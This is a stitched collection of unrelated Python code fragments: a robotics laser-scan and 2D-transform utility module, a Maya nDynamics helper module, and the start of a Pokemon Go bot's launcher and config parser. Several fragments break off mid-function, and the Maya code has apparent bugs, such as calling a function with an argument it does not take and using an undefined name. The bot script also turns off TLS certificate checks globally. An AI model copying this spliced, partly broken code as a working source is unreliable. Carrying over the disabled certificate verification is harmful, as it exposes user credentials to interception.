Pxy : 1-D array
The values for the cross spectrum :math:`P_{xy}` before scaling (real
valued)
freqs : 1-D array
The frequencies corresponding to the elements in | |
import glob
import json
import os.path
import math
from functools import reduce
from typing import Union
from collections.abc import Iterable
from datetime import datetime
import numpy as np
import scipy.interpolate
from matplotlib import transforms, rcParams
import matplotlib.pyplot as plt
from matplotlib.patches import Rectangle, Ellipse
from matplotlib.widgets import Button
import seaborn as sns
import pint
from icecream import ic
from scripts.data_path import *
rcParams['figure.constrained_layout.use'] = True
rcParams['figure.dpi'] = 100
rcParams['font.size'] = 12
sns.set_style('darkgrid')
inf = float('inf')
reg = pint.UnitRegistry()
def unit_converter(m, src=reg.inch, dst=reg.meter):
return (m * src).to(dst).magnitude
def json_load(fnm):
f = open(fnm, 'r')
scans = json.load(f)
f.close()
return scans
def now(as_str=True):
d = datetime.now()
return d.strftime('%Y-%m-%d %H:%M:%S') if as_str else d
def get(dic, ks):
# return reduce(lambda acc, elm: acc[elm], keys, dic)
return reduce(lambda acc, elm: acc[elm] if elm in acc else None, ks.split('.'), dic)
def config(attr):
"""
Retrieves the queried attribute value from the config file.
Loads the config file on first call.
"""
if not hasattr(config, 'config'):
with open(f'{PATH_BASE}/{DIR_PROJ}/config.json') as f:
config.config = json.load(f)
return get(config.config, attr)
# ic('here', attr)
# if isinstance(ret, dict) and list(ret.keys())[0].isdigit(): # For JSON write
# ic('here')
# ret = {int(k): v for k, v in ret.items()}
# return ret
def eg_hsr_scan(k1=0, k2=77):
"""
:return: Example HSR laser scan as 2D coordinates, given file name and measurement number
"""
path = os.path.join(PATH_BASE, DIR_DATA)
fls = sorted(glob.iglob(f'{path}/{config(f"{DIR_DATA}.eg.HSR.fmt")}', recursive=True))
hsr_scans = json_load(fls[k1])
s = hsr_scans[k2]
return laser_polar2planar(s['angle_max'], s['angle_min'])(np.array(s['ranges']))
def pts2max_dist(pts):
"""
:param pts: List of 2d points
:return: The maximum distance between any two pairs of points
"""
assert pts.shape[1] == 2
def dist(a, b):
return (a[0] - b[0])**2 + (a[1] - b[1])**2
n = pts.shape[0]
idxs = ((i, j) for i in range(n-1) for j in range(i, n))
# ic(list(idxs))
return math.sqrt(max(dist(pts[a], pts[b]) for a, b in idxs))
def clipper(low, high):
"""
:return: A clipping function for range [low, high]
"""
return lambda x: max(min(x, high), low)
def get_3rd_side(a, b):
"""
Returns hypotenuse of a right-angled triangle, given its other sides
"""
# return np.sqrt(np.sum(np.square(mags)))
return math.sqrt(a**2 + b**2)
class JsonWriter:
"""
Each time the object is called, the data is appended to the end of a list which is serialized to a JSON file
"""
def __init__(self, fnm):
self.fnm = fnm
self.data = []
self.fnm_ext = f'data/{self.fnm}.json'
open(self.fnm_ext, 'a').close() # Create file in OS
def __call__(self, data):
f = open(self.fnm_ext, 'w')
self.data.append(data)
json.dump(self.data, f, indent=4)
# ic(self.data)
def laser_scan2dict(data):
"""
:param data: Of type [sensor_msgs/LaserScan](https://docs.ros.org/en/noetic/api/sensor_msgs/html/msg/LaserScan.html)
"""
h = data.header
d_h = dict(
seq=h.seq,
stamp=dict(
secs=h.stamp.secs,
nsecs=h.stamp.nsecs
),
frame_id=h.frame_id
)
return dict(
header=d_h,
angle_min=data.angle_min,
angle_max=data.angle_max,
angle_increment=data.angle_increment,
time_increment=data.time_increment,
scan_time=data.scan_time,
range_min=data.range_min,
ranges=data.ranges,
intensities=data.intensities
)
def extend_1s(arr):
"""
Return array with column of 1's appended
:param arr: 2D array
"""
return np.hstack([arr, np.ones([arr.shape[0], 1])])
def cartesian(arrs: list, out=None):
"""
:param arrs: list of 1D arrays
:param out: Array to place the cartesian product in.
:return: Cartesian product of `arrs` of shape
Modified from https://stackoverflow.com/a/1235363/10732321
"""
arrs = [np.asarray(x) for x in arrs]
n = np.prod([x.size for x in arrs])
if out is None:
out = np.zeros([n, len(arrs)], dtype=arrs[0].dtype)
m = int(n / arrs[0].size)
out[:, 0] = np.repeat(arrs[0], m)
if arrs[1:]:
cartesian(arrs[1:], out=out[0:m, 1:])
for j in range(1, arrs[0].size):
out[j*m:(j+1)*m, 1:] = out[0:m, 1:]
return out
def polar2planar(dist, angle):
return (
dist * np.cos(angle),
dist * np.sin(angle)
)
def laser_polar2planar(a_max, a_min, split=False):
"""
:param a_max: Maximum angle
:param a_min: Minimum angle
:param split: If True, the function returns a 2-tuple of x and y coordinates
:return: A function that returns an array of 2D points
Assumes the angles are [a_min, a_max)
"""
def _get(ranges):
"""
:param ranges: Array of laser scan ranges
Number of beams taken from size of `range`;
"""
theta = np.linspace(a_min, a_max, num=ranges.size + 1)[:-1]
x, y = polar2planar(ranges, theta)
return (x, y) if split else np.vstack([x, y]).T
return _get
def rot_mat(theta):
c, s = np.cos(theta), np.sin(theta)
return np.array([
[c, -s],
[s, c]
])
def tsl_n_angle2tsf(tsl: Iterable = np.array([0, 0]), theta: Union[int, float] = 0):
"""
Converts translation in 2D & an angle into matrix transformation
:param tsl: 3-array of (translation_x, translation_y, theta),
or 2-array of (translation_x, translation_y)
:param theta: Angle in radians
"""
tsl = np.asarray(tsl)
tsf = np.identity(3)
tsf[:2, 2] = tsl[:2]
# ic(tsl[-1] if tsl.size == 3 else theta)
tsf[:2, :2] = rot_mat(tsl[-1] if tsl.size == 3 else theta)
return tsf
def tsf2tsl_n_angle(tsf):
"""
:return: 2-tuple of 2D translation and angle in radians from transformation matrix
"""
return tsf[:2, 2], math.acos(tsf[0][0])
def apply_tsf_2d(arr, tsf):
"""
Syntactic sugar
:param arr: Array of 2D points
:param tsf: Transformation matrix in R^{3 x 3}
:return: Array of 2D points with transformation matrix applied
"""
return (extend_1s(arr[:, :2]) @ tsf.T)[:, :2]
def get_kuka_pointcloud():
# d_dim = config('dimensions.KUKA')
# return get_rect_pointcloud(d_dim['length'], d_dim['width'])
return get_rect_pointcloud(config('dimensions.KUKA'))
def get_rect_pointcloud(dim, n=240, visualize=False):
"""
:param dim: 2-tuple of (length, width) of dict with keys `length` and `width`
:param n: Number of points/beams
:param visualize: If True, shows an illustration of the process
:return: Array of 2D points of a rectangular contour, as if by a 360 degree of beams
"""
ln, wd = dim['length'], dim['width'] if isinstance(dim, dict) else dim
r = max(ln, wd)
r = np.full(n, r)
theta = np.linspace(0, 2 * math.pi, num=n+1)[:-1]
x, y = polar2planar(r, theta)
boundaries = (-ln/2, -wd/2, ln/2, wd/2)
def intersec_rect(left, bot, right, top):
""" :return: function that returns the intersection of point relative to a rectangle """
def _get(x_, y_):
"""
x, y should be outside of the rectangle
"""
ct_x = (left + right) / 2
ct_y = (bot + top) / 2
slope = (ct_y - y_) / (ct_x - x_)
if x_ <= ct_x:
y__ = slope * (left - x_) + y_
if bot <= y__ <= top:
return left, y__
if x_ >= ct_x:
y__ = slope * (right - x_) + y_
if bot <= y__ <= top:
return right, y__
if y_ <= ct_y:
x__ = (bot - y_) / slope + x_
if left <= x__ <= right:
return x__, bot
if y_ >= ct_y:
x__ = (top - y_) / slope + x_
if left <= x__ <= right:
return x__, top
if x_ == ct_x and y_ == ct_y:
return x_, y_
return _get
if visualize:
fig, ax = plt.subplots(figsize=(16, 9), constrained_layout=True)
for x_i, y_i in zip(x, y):
x_int, y_int = intersec_rect(*boundaries)(x_i, y_i)
ax.add_patch(Rectangle((-ln/2, -wd/2), ln, wd, edgecolor='b', fill=False))
ax.plot((0, x_int), (0, y_int), marker='o', c='c', ms=2, lw=0.5, ls='dotted')
ax.plot((x_i, x_int), (y_i, y_int), marker='o', c='orange', ms=2, ls='dotted')
plt.gca().set_aspect('equal')
plt.show()
intersec = intersec_rect(*boundaries)
return np.apply_along_axis(lambda i: intersec(*i), 1, np.vstack([x, y]).T)
def save_fig(save, title):
if save:
fnm = f'{title}.png'
plt.savefig(os.path.join(PATH_BASE, DIR_PROJ, 'plot', fnm), dpi=300)
def plot_points(arr, **kwargs):
"""
:param arr: Array of 2d points to plot
:param kwargs: Arguments are forwarded to `matplotlib.axes.Axes.plot`
"""
arr = np.asarray(arr)
kwargs_ = dict(
marker='.', lw=0.5, ms=1,
c='orange',
)
plt.plot(arr[:, 0], arr[:, 1], **(kwargs_ | kwargs))
def plot_2d(arr, label=None, title=None, save=False, show=True, **kwargs):
""" Plot potentially list pf 2D points """
def _plot(a, lb):
plt.plot(a[:, 0], a[:, 1], marker='o', ms=0.3, lw=0.25, label=lb, **kwargs)
plt.figure(figsize=(16, 9), constrained_layout=True)
if not isinstance(arr, list):
arr = [arr]
lbl = [None for _ in arr] if label is None else label
_ = [_plot(a, lb) for a, lb in zip(arr, lbl)] # Execute
if label:
plt.legend()
if title:
plt.title(title)
plt.gca().set_aspect('equal')
save_fig(save, title)
if show:
plt.show()
def plot_points3d(arr, **kwargs):
"""
:param arr: Array of 3d points to plot
:param kwargs: Arguments are forwarded to `matplotlib.axes.Axes.plot`
"""
arr = np.asarray(arr)
kwargs_ = dict(
marker='.', lw=0.5, ms=1,
c='orange',
)
plt.plot(arr[:, 0], arr[:, 1], arr[:, 2], **(kwargs_ | kwargs))
def plot_line_seg(c1, c2, with_arrow=True, **kwargs):
kwargs_ = dict(
ls='dotted', marker='o', lw=1, ms=2,
c='orange',
)
kwargs = kwargs_ | kwargs
plt.plot((c1[0], c2[0]), (c1[1], c2[1]), **kwargs)
if with_arrow:
plot_line_seg_arrow(c1, c2, color=get(kwargs, 'c'), alpha=get(kwargs, 'alpha'))
def plot_line_seg_arrow(c1, c2, r=0.01, **kwargs):
coords = np.array([c1, c2])
mean = coords.mean(axis=0)
mags = (coords[1] - coords[0]) * r
width = 5 * get_3rd_side(*mags)
if not hasattr(plot_icp_result, 'clp'):
plot_icp_result.clp = clipper(0.01, 0.05)
width = plot_icp_result.clp(width)
kwargs_ = dict(
alpha=0.5,
# head_width=0.05,
head_width=width,
length_includes_head=True,
lw=0,
overhang=0.2,
)
plt.arrow(
*(mean-mags/2), *mags,
**(kwargs_ | kwargs)
)
def plot_icp_result(
src, tgt, tsf,
title=None, save=False, | |
<reponame>fsanges/glTools
import maya.cmds as mc
import maya.mel as mm
import glTools.utils.attribute
import glTools.utils.base
import glTools.utils.mesh
import glTools.utils.stringUtils
from glTools.utils.weightList import WeightList
import os.path
# ----------
# - Checks -
# ----------
def isNDynamicsNode(nNode):
'''
Check if the specified object is a valid nDynamics node
@param node: Node to query
@type node: str
'''
# Check object exists
if not mc.objExists(nNode): return False
# Check shape
if mc.objectType(nNode) == 'transform': nNode = mc.listRelatives(nNode,s=True,ni=True,pa=True)[0]
# Check nucleus
if mc.objectType(nNode) == 'nucleus': return True
# Check nCloth
if mc.objectType(nNode) == 'nCloth': return True
# Check nRigid
if mc.objectType(nNode) == 'nRigid': return True
# Check nParticle
if mc.objectType(nNode) == 'nParticle': return True
# Check nComponent
if mc.objectType(nNode) == 'nComponent': return True
# Check dynamicConstraint
if mc.objectType(nNode) == 'dynamicConstraint': return True
# Return result
return False
def isNType(nNode,nType):
'''
Check if the specified object is a nucleus compatible nDynamics node
@param nNode: Object or node to query
@type nNode: str
@param nType: Nucleus compatible node type to check for
@type nType: str
'''
# Check object exists
if not mc.objExists(nNode): return False
# Check shape
if mc.objectType(nNode) == 'transform': nNode = mc.listRelatives(nNode,s=True,ni=True,pa=True)[0]
if mc.objectType(nNode) != nType: return False
# Return result
return True
def isNucleus(nucleus):
'''
Check if the specified object is a nucleus node
@param nucleus: Object to query
@type nucleus: str
'''
return isNType(nucleus,'nucleus')
def isNCloth(nCloth):
'''
Check if the specified object is an nCloth node
@param nCloth: Object to query
@type nCloth: str
'''
return isNType(nCloth,'nCloth')
def isNRigid(nRigid):
'''
Check if the specified object is an nRigid node
@param nRigid: Object to query
@type nRigid: str
'''
return isNType(nRigid,'nRigid')
def isNParticle(nParticle):
'''
Check if the specified object is an nParticle node
@param nParticle: Object to query
@type nParticle: str
'''
return isNType(nParticle,'nParticle')
def isNComponent(nComponent):
'''
Check if the specified object is an nComponent node
@param nComponent: Object to query
@type nComponent: str
'''
return isNType(nComponent,'nComponent')
def isNConstraint(nConstraint):
'''
Check if the specified object is an nConstraint node
@param nConstraint: Object to query
@type nConstraint: str
'''
return isNType(nConstraint,'dynamicConstraint')
def getConnectedNucleus(obj):
'''
Get the nucleus node connected to the specified nDynamics object
@param name: Name for nucleus node
@type name: str
'''
# Check nNode
if mc.objectType(obj) == 'transform':
obj = mc.listRelatives(obj,s=True,ni=True,pa=True)[0]
if not isNDynamicsNode(obj):
nNode = getConnectedNNode(obj)
if not nNode: raise Exception('No valid nDynamics node connected to "'+obj+'"!')
nNode = nNode[0]
else:
nNode = obj
# Check nucleus connections
nucleusConn = mc.listConnections(nNode,type='nucleus')
# Return result
if nucleusConn: return nucleusConn[0]
else: return ''
def getConnectedNNode(obj,nType=''):
'''
@param object: Object to find connected nNode for
@type object: str
@param nType: nDynamics node to check for. If empty, search for any valid nDynamics node
@type nType: str
'''
# Check object exists
if not mc.objExists(obj):
raise Exception('Object "'+obj+'" does not exist!')
# Check nNode
nNode = obj
if mc.objectType(obj) == 'transform':
nNodeShape = mc.listRelatives(obj,s=True,ni=True,pa=True)
if nNodeShape: nNode = nNodeShape[0]
if isNDynamicsNode(nNode):
if not nType or nType == mc.objectType(nNode):
return [nNode]
# Check nCloth
if not nType or nType == 'nCloth':
nNodeConn = mc.listConnections(nNode,type='nCloth',shapes=True)
if nNodeConn: return list(set(nNodeConn))
# Check nRigid
if not nType or nType == 'nRigid':
nNodeConn = mc.listConnections(nNode,type='nRigid',shapes=True)
if nNodeConn: return list(set(nNodeConn))
# Check nParticle
if not nType or nType == 'nParticle':
nNodeConn = mc.listConnections(nNode,type='nParticle',shapes=True)
if nNodeConn: return list(set(nNodeConn))
# Check nComponent
if not nType or nType == 'nComponent':
nNodeConn = mc.listConnections(nNode,type='nComponent',shapes=True)
if nNodeConn: return list(set(nNodeConn))
# No nNode found, return empty result
return []
def getConnectedNCloth(obj):
'''
Return the nCloth node connected to the specified object
@param object: Object to find connected nNode for
@type object: str
'''
return getConnectedNNode(obj,'nCloth')
def getConnectedNRigid(obj):
'''
Return the nRigid node connected to the specified object
@param object: Object to find connected nNode for
@type object: str
'''
return getConnectedNNode(obj,'nRigid')
def getConnectedNParticle(obj):
'''
Return the nParticle node connected to the specified object
@param object: Object to find connected nNode for
@type object: str
'''
return getConnectedNNode(obj,'nParticle')
def getConnectedNComponent(obj):
'''
'''
return getConnectedNNode(obj,'nComponent')
def getConnectedMesh(nNode,returnShape=False):
'''
Find the mesh shape or transform nodes connected to the specified nDynamics node
@param nNode: The nDynamics node to find the connected meshes for
@type nNode: str
@param returnShape: Return the mesh shape instead of the mesh transform
@type returnShape: bool
'''
# Check nNode node
if not isNDynamicsNode(nNode):
nNode = getConnectedNNode(nNode)
# Check outgoing connections
meshConn = mc.listConnections(nNode,s=False,d=True,sh=returnShape,type='mesh')
if meshConn: return meshConn[0]
# Check incoming connections
meshConn = mc.listConnections(nNode,s=True,d=False,sh=returnShape,type='mesh')
if meshConn: return meshConn[0]
# No mesh connections found, return empty result
return ''
# --------------------------
# - Get/Set Active Nucleus -
# --------------------------
def getActiveNucleus():
'''
Query the active nucleus node
'''
# Query active nucleus
nucleus = mm.eval('getActiveNucleusNode(true,false)')
# Return result
return nucleus
def setActiveNucleus(nucleus):
'''
Set the active nucleus node
@param nucleus: Nucleus node to set as current active nucleus
@type nucleus: str
'''
# Check nucleus
if not isNucleus(nucleus):
raise Exception('Object "'+nucleus+'" is not a valid nucleus node!')
# Set active nucleus
mm.eval('source getActiveNucleusNode')
mm.eval('setActiveNucleusNode("'+nucleus+'")')
# ----------------
# - Create Nodes -
# ----------------
def createNucleus(name='',setActive=True):
'''
Create nucleus node and make necessary connections
@param name: Name for nucleus node
@type name: str
@param setActive: Set the created nucleus as the current active nucleus
@type setActive: str
'''
# Check nucleus name
if not name: name = 'nucleus#'
# Create nucleus node
nucleus = mc.createNode('nucleus',n=name)
mc.connectAttr('time1.outTime',nucleus+'.currentTime')
# Set active nucleus
if setActive: setActiveNucleus(nucleus)
# Return result
return nucleus
def createNCloth(mesh,nucleus='',worldSpace=False,prefix=''):
'''
Create an nCloth object from the specified mesh.
@param mesh: Mesh to create nCloth from
@type mesh: str
@param nucleus: nucleus to attach nCloth to
@type nucleus: str
@param worldSpace: nCloth deformations in local or world space
@type worldSpace: str
@param prefix: Name prefix for created nodes
@type prefix: str
'''
# Check mesh
if not glTools.utils.mesh.isMesh(mesh):
raise Exception('Object "'+mesh+'" is not a valid mesh!')
# Check prefix
if not prefix:
if '_' in mesh: prefix = glTools.utils.stringUtils.stripSuffix(mesh)
else: prefix = mesh
if ':' in prefix: prefix = prefix.split(':')[-1]
# Check nucleus
if nucleus:
if not isNucleus(nucleus):
print('Object "'+nucleus+'" is not a valid nucleus. Using current active nucleus!')
getActiveNucleus(nucleus)
# Set active nucleus
setActiveNucleus(nucleus)
# Create nCloth from mesh
mc.select(mesh)
nClothShape = mm.eval('createNCloth '+str(int(worldSpace)))
nCloth = mc.listRelatives(nClothShape,p=True)[0]
# Rename nCloth
nCloth = mc.rename(nCloth,prefix+'_nCloth')
nClothShape = mc.listRelatives(nCloth,s=True)[0]
# Get outMesh
outMesh = mc.listConnections(nClothShape+'.outputMesh',s=False,d=True,sh=True)[0]
outMesh = mc.rename(outMesh,mesh+'ClothShape')
# return result
return nCloth
def createNRigid(mesh,nucleus='',prefix=''):
'''
Create an nRigid object from the specified mesh.
@param mesh: Mesh to create nRigid from
@type mesh: str
@param nucleus: nucleus to attach nRigid to
@type nucleus: str
@param prefix: Name prefix for created nodes
@type prefix: str
'''
# Check mesh
if not glTools.utils.mesh.isMesh(mesh):
raise Exception('Object "'+mesh+'" is not a valid mesh!')
# Check prefix
if not prefix:
if '_' in mesh: prefix = glTools.utils.stringUtils.stripSuffix(mesh)
else: prefix = mesh
if ':' in prefix: prefix = prefix.split(':')[-1]
# Check nucleus
if nucleus:
if not isNucleus(nucleus):
print('Object "'+nucleus+'" is not a valid nucleus. Using current active nucleus!')
getActiveNucleus(nucleus)
# Set active nucleus
setActiveNucleus(nucleus)
# Create nRigid from mesh
mc.select(mesh)
nRigidShape = mm.eval('makeCollideNCloth')
nRigid = mc.listRelatives(nRigidShape,p=True,pa=True)[0]
# Rename nCloth
nRigid = mc.rename(nRigid,prefix+'_nRigid')
# Return result
return nRigid
def createNParticle(ptList=[],nucleus='',prefix=''):
'''
Create an nParticle object.
@param ptList: Mesh to create nCloth from
@type ptList: str
@param nucleus: nucleus to attach nCloth to
@type nucleus: str
@param prefix: Name prefix for created nodes
@type prefix: str
'''
# Check prefix
if prefix: nParticle = prefix+'_nParticle'
else: nParticle = 'nParticle#'
# Check nucleus
if nucleus:
if not isNucleus(nucleus):
print('Object "'+nucleus+'" is not a valid nucleus. Using current active nucleus!')
getActiveNucleus(nucleus)
# Set active nucleus
setActiveNucleus(nucleus)
# Create nParticles
nParticle = mc.nParticle(p=ptList,n=nParticle)
def softBody(geometry,nucleus='',prefix=''):
'''
Create an nParticle softBody from the specified geoemtry
@param geometry: Mesh to create nRigid from
@type geometry: str
@param nucleus: nucleus to attach nRigid to
@type nucleus: str
@param prefix: Name prefix for created nodes
@type prefix: str
'''
# Check prefix
if not prefix: prefix = geometry
# Check geometry
geometryType = mc.objectType(geometry)
if geometryType == 'transform':
geometryTransform = geometry
geometryShapes = glTools.utils.shape.getShapes(geometry,nonIntermediates=True,intermediates=False)
if not geometryShapes: raise Exception('No valid geometry shapes found!')
geometryShape = geometryShapes[0]
else:
geometryTransform = mc.listRelatives(geometry,p=True)[0]
geometryShape = geometry
# Check geometry type
geometryType = mc.objectType(geometryShape)
if geometryType == 'mesh': geometryAttribute = 'inMesh'
elif geometryType == 'nurbsCurve': geometryAttribute = 'create'
elif geometryType == 'nurbsSurface': geometryAttribute = 'create'
else: raise Exception('Invalid geometry type ('+geometryType+')!')
# Get geometry points
mPtList = glTools.utils.base.getMPointArray(geometry)
ptList = [(i[0],i[1],i[2]) for i in mPtList]
# Create nParticles
nParticle = mc.nParticle(p=ptList,n=prefix+'_nParticle')
# Connect to geometry
mc.connectAttr(geometryTransform+'.worldMatrix[0]',nParticle+'.targetGeometryWorldMatrix',f=True)
mc.connectAttr(nParticle+'.targetGeometry',geometryShape+'.'+geometryAttribute,f=True)
# Return result
return nParticle
# -----------------
# - Connect Nodes -
# -----------------
def connectToNucleus(object,nucleus):
'''
Connect the specified nDynamics node to an existing nucleus node
@param object: nDynamics node to connect to the nucleus solver
@type object: str
@param nucleus: nucleus solver to connect to
@type nucleus: str
'''
# Check nucleus
if not isNucleus(nucleus):
preNucleusList = mc.ls(type='nucleus')
# Check nDynamics node
if isNDynamicsNode(object):
nNode = object
else:
nNode = getConnectedNNode(nNode)
if not nNode: raise Exception('Object "'+object+'" is not a valid nDynamics node, or connected to a valid nDynamics node!')
nNode = nNode[0]
# Check nRigid
if isNRigid(nNode): connectNRigidToNucleus(nNode,nucleus,True)
# Assign nNode to nucleus solver
mc.select(nNode)
mm.eval('assignNSolver '+nucleus)
# Rename new nucleus node
if not mc.objExists(nucleus):
postNucleusList = mc.ls(type='nucleus')
newNucleus = list(set(postNucleusList) - set(preNucleusList))
if not newNucleus: raise Exception('Unable to determine new nucleus node attached to "'+object+'"!')
nucleus = mc.rename(newNucleus[0],nucleus)
# Return result
mc.select(nucleus)
return nucleus
def connectNRigidToNucleus(nRigid,nucleus,createNucleus=True):
'''
Connect the named nRigid (passive collision mesh) to the specified nucleus node
while maintaining existing connections to other nucleus nodes.
@param nRigid: nRigid node to attach
@type nRigid: str
@param nucleus: nucleus node to attach to
@type nucleus: str
@param createNucleus: Create a new nucleus node if the specified node doesn't exist
@type createNucleus: str
'''
# Check nRigid node
if not isNRigid(nRigid):
nRigid = getConnectedNRigid(nRigid)
if not nRigid: raise Exception('Object "'+nRigid+'" is not a valid nRigid node!')
nRigid = nRigid[0]
# Check nucleus
if not isNucleus(nucleus):
if createNucleus: nucleus = createNucleus(nucleus)
else: raise Exception('Object "'+nucleus+'" is not a valid nucleus node!')
# Get next available index
nIndex = glTools.utils.attribute.nextAvailableMultiIndex(nucleus+'.inputPassive',0)
# Connect to nucleus
mc.connectAttr(nRigid+'.currentState',nucleus+'.inputPassive['+str(nIndex)+']')
mc.connectAttr(nRigid+'.startState',nucleus+'.inputPassiveStart['+str(nIndex)+']')
# Return result
return nIndex
# ----------------
# - Delete Nodes -
# ----------------
def deleteUnusedNucleusNodes():
'''
Delete all nucleus nodes that have no valid outgoing connections
'''
# Get existsing nucleus nodes
nucleusList = mc.ls(type=nucleus)
# Initialize return list
nucleusDel = []
# Iterate over nodes
for nucleus in nucleusList:
# Check outgoing connections
nConn = mc.listConnections(nucleus,s=False,d=True)
if not nConn: nucleusDel.append(nucleus)
# Delete unused nucleus nodes
mc.delete(nucleusDel)
# Return result
return nucleusDel
def | |
<gh_stars>0
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
pgoapi - Pokemon Go API
Copyright (c) 2016 tjado <https://github.com/tejado>
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM,
DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR
OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE
OR OTHER DEALINGS IN THE SOFTWARE.
Author: tjado <https://github.com/tejado>
"""
import argparse
import codecs
import json
import logging
import os
import ssl
import sys
import time
from datetime import timedelta
from getpass import getpass
from pgoapi.exceptions import NotLoggedInException
from pokemongo_bot import PokemonGoBot, TreeConfigBuilder
from pokemongo_bot import logger
if sys.version_info >= (2, 7, 9):
ssl._create_default_https_context = ssl._create_unverified_context
def main():
logger.log('PokemonGO Bot v1.0', 'green')
sys.stdout = codecs.getwriter('utf8')(sys.stdout)
sys.stderr = codecs.getwriter('utf8')(sys.stderr)
config = init_config()
if not config:
return
logger.log('Configuration initialized', 'yellow')
finished = False
while not finished:
try:
bot = PokemonGoBot(config)
bot.start()
tree = TreeConfigBuilder(bot, config.raw_tasks).build()
bot.workers = tree
bot.metrics.capture_stats()
logger.log('Starting PokemonGo Bot....', 'green')
while True:
bot.tick()
except KeyboardInterrupt:
logger.log('Exiting PokemonGo Bot', 'red')
finished = True
report_summary(bot)
except NotLoggedInException:
logger.log('[x] Error while connecting to the server, please wait %s minutes' % config.reconnecting_timeout, 'red')
time.sleep(config.reconnecting_timeout * 60)
except:
# always report session summary and then raise exception
report_summary(bot)
raise
def report_summary(bot):
if bot.metrics.start_time is None:
return # Bot didn't actually start, no metrics to show.
metrics = bot.metrics
metrics.capture_stats()
logger.log('')
logger.log('Ran for {}'.format(metrics.runtime()), 'cyan')
logger.log('Total XP Earned: {} Average: {:.2f}/h'.format(metrics.xp_earned(), metrics.xp_per_hour()), 'cyan')
logger.log('Travelled {:.2f}km'.format(metrics.distance_travelled()), 'cyan')
logger.log('Visited {} stops'.format(metrics.visits['latest'] - metrics.visits['start']), 'cyan')
logger.log('Encountered {} pokemon, {} caught, {} released, {} evolved, {} never seen before'
.format(metrics.num_encounters(), metrics.num_captures(), metrics.releases,
metrics.num_evolutions(), metrics.num_new_mons()), 'cyan')
logger.log('Threw {} pokeball{}'.format(metrics.num_throws(), '' if metrics.num_throws() == 1 else 's'),
'cyan')
logger.log('Earned {} Stardust'.format(metrics.earned_dust()), 'cyan')
logger.log('')
if metrics.highest_cp is not None:
logger.log('Highest CP Pokemon: {}'.format(metrics.highest_cp['desc']), 'cyan')
if metrics.most_perfect is not None:
logger.log('Most Perfect Pokemon: {}'.format(metrics.most_perfect['desc']), 'cyan')
def init_config():
parser = argparse.ArgumentParser()
config_file = "configs/config.json"
web_dir = "web"
# If config file exists, load variables from json
load = {}
# Select a config file code
parser.add_argument("-cf", "--config", help="Config File to use")
config_arg = parser.parse_known_args() and parser.parse_known_args()[0].config or None
if config_arg and os.path.isfile(config_arg):
with open(config_arg) as data:
load.update(json.load(data))
elif os.path.isfile(config_file):
logger.log('No config argument specified, checking for /configs/config.json', 'yellow')
with open(config_file) as data:
load.update(json.load(data))
else:
logger.log('Error: No /configs/config.json or specified config', 'red')
# Read passed in Arguments
required = lambda x: not x in load
add_config(
parser,
load,
short_flag="-a",
long_flag="--auth_service",
help="Auth Service ('ptc' or 'google')",
required=required("auth_service"),
default=None
)
add_config(
parser,
load,
short_flag="-u",
long_flag="--username",
help="Username",
default=None
)
add_config(
parser,
load,
short_flag="-ws",
long_flag="--websocket_server",
help="Start websocket server (format 'host:port')",
default=False
)
add_config(
parser,
load,
short_flag="-p",
long_flag="--password",
help="Password",
default=None
)
add_config(
parser,
load,
short_flag="-l",
long_flag="--location",
help="Location",
type=parse_unicode_str,
default=''
)
add_config(
parser,
load,
short_flag="-lc",
long_flag="--location_cache",
help="Bot will start at last known location",
type=bool,
default=False
)
add_config(
parser,
load,
long_flag="--forts.spin",
help="Enable Spinning Pokestops",
type=bool,
default=True,
)
add_config(
parser,
load,
short_flag="-w",
long_flag="--walk",
help=
"Walk instead of teleport with given speed (meters per second, e.g. 2.5)",
type=float,
default=2.5
)
add_config(
parser,
load,
short_flag="-k",
long_flag="--gmapkey",
help="Set Google Maps API KEY",
type=str,
default=None
)
add_config(
parser,
load,
short_flag="-ms",
long_flag="--max_steps",
help=
"Set the steps around your initial location(DEFAULT 5 mean 25 cells around your location)",
type=int,
default=50
)
add_config(
parser,
load,
short_flag="-n",
long_flag="--navigator.type",
help="Set the navigator to be used(DEFAULT spiral)",
type=str,
default='spiral'
)
add_config(
parser,
load,
short_flag="-pm",
long_flag="--navigator.path_mode",
help="Set the mode for the path navigator (DEFAULT loop)",
type=str,
default="loop"
)
add_config(
parser,
load,
short_flag="-pf",
long_flag="--navigator.path_file",
help="Set the file containing the path for the path navigator (GPX or JSON).",
type=str,
default=None
)
add_config(
parser,
load,
short_flag="-d",
long_flag="--debug",
help="Debug Mode",
type=bool,
default=False
)
add_config(
parser,
load,
short_flag="-t",
long_flag="--test",
help="Only parse the specified location",
type=bool,
default=False
)
add_config(
parser,
load,
short_flag="-du",
long_flag="--distance_unit",
help="Set the unit to display distance in (e.g, km for kilometers, mi for miles, ft for feet)",
type=str,
default='km'
)
add_config(
parser,
load,
short_flag="-ev",
long_flag="--evolve_all",
help="(Batch mode) Pass \"all\" or a list of pokemon to evolve (e.g., \"Pidgey,Weedle,Caterpie\"). Bot will start by attempting to evolve all pokemon. Great after popping a lucky egg!",
type=str,
default=[]
)
add_config(
parser,
load,
short_flag="-ecm",
long_flag="--evolve_cp_min",
help="Minimum CP for evolve all. Bot will attempt to first evolve highest IV pokemon with CP larger than this.",
type=int,
default=300
)
add_config(
parser,
load,
short_flag="-ec",
long_flag="--evolve_captured",
help="(Ad-hoc mode) Pass \"all\" or a list of pokemon to evolve (e.g., \"Pidgey,Weedle,Caterpie\"). Bot will attempt to evolve all the pokemon captured!",
type=str,
default=[]
)
add_config(
parser,
load,
short_flag="-le",
long_flag="--use_lucky_egg",
help="Uses lucky egg when using evolve_all",
type=bool,
default=False
)
add_config(
parser,
load,
short_flag="-rt",
